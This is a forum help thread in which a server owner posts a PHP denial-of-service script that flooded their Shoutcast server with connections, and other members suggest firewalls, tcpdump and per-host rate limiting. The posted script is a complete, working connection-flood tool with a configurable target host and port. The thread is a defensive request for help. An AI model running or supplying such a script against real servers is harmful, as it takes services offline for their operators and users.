i need help

A

adamp

Verified User
Joined
Jan 11, 2007
Messages
137
someone attack my da server with this code

<?php

####################
$host = "250.250.250.250";
$port = "5555";
$times = 99999999999999999999999999999999999999999999999999999; # number of connections
$loop = 0; # (0/1) 1 = don't stop connecting, 0 = stop after `$times` connections.
####################

ini_set("max_execution_time",0);
ini_set("default_socket_timeout",0);

$sock = array();
$sc = 0;

$PrePacket = "GET / HTTP/1.0\r\n";
$PrePacket.= "Host: {$host}\r\n";
$PrePacket.= "User-Agent: WinampMPEG/5.30\r\n";
$PrePacket.= "Accept: */*\r\n";
$PrePacket.= "Icy-MetaData:1\r\n";
$PrePacket.= "Connection: close\r\n\r\n";

do {
for($i = 1; $i <= $times; $i++) {
$sock[$i] = @fsockopen($host, $port);
if($sock[$i]) {
$sc++;
echo "[~] {$sc}/{$i}\t\t\r";
$alive[$i] = 1;
fputs($sock[$i], $PrePacket);
if($sock[$i-1]) {
fclose($sock[$i-1]);
}
}
}
} while ($loop);
?>
Click to expand...


someone can help me what i can to do??
 
For a long-term solution you can try firewalling your system to close all unnecessary ports
Which firewall software you use is dependant on your OS, for Linux you could try APF or KISS My Firewall;
http://www.directadmin.com/forum/showthread.php?t=14500
http://www.directadmin.com/forum/showthread.php?t=22587

Or for FreeBSD you could choose either IPFW or PF, although is seems there is not a guide for it on these forums I always prefer the PF;
http://www.directadmin.com/forum/showthread.php?t=10906
 
jlasman said:
And how is firewalling going to stop a php file from executing?

Jeff
Click to expand...

Why did you get the impression this script was running locally? Seeing $host = "250.250.250.250"; would indicate to me that this can be used to attack any remote IP.

Obviously the simplest way to stop local attacks is to watch who you give out access to.
 
Why did you get the impression this script was running locally?
Click to expand...

Maybe I am stupid but if the script was being run remotely then how would he know what the code was? My impression is he found the script (probably in /tmp) and then looked at and posted it.
 
Rich-Boy said:
Why did you get the impression this script was running locally? Seeing $host = "250.250.250.250"; would indicate to me that this can be used to attack any remote IP.

Obviously the simplest way to stop local attacks is to watch who you give out access to.
Click to expand...

this script run from other server
and i need to use with port 5555
i don't want to close him
 
adamp said:
this script run from other server
and i need to use with port 5555
i don't want to close him
Click to expand...

Yeah... I thought as much.

To begin with I'd take a close look at tcpdump. It would be a good idea to find out how many attacking IPs your dealing with but seeing as you already know it's a PHP script doing the dirty work I'd guess that there aren't many. Out of interest what software is the client running which is bound to port 5555?

tcpdump will hopefully give you some clues as to the attacking IPs but in the mean time you could try rate limiting on a per-host basis via your software firewall although this may hinder legit users.
 
Rich-Boy said:
Yeah... I thought as much.

To begin with I'd take a close look at tcpdump. It would be a good idea to find out how many attacking IPs your dealing with but seeing as you already know it's a PHP script doing the dirty work I'd guess that there aren't many. Out of interest what software is the client running which is bound to port 5555?

tcpdump will hopefully give you some clues as to the attacking IPs but in the mean time you could try rate limiting on a per-host basis via your software firewall although this may hinder legit users.
Click to expand...

shoutcast radio server
 
You must log in or register to reply here.
Back
Top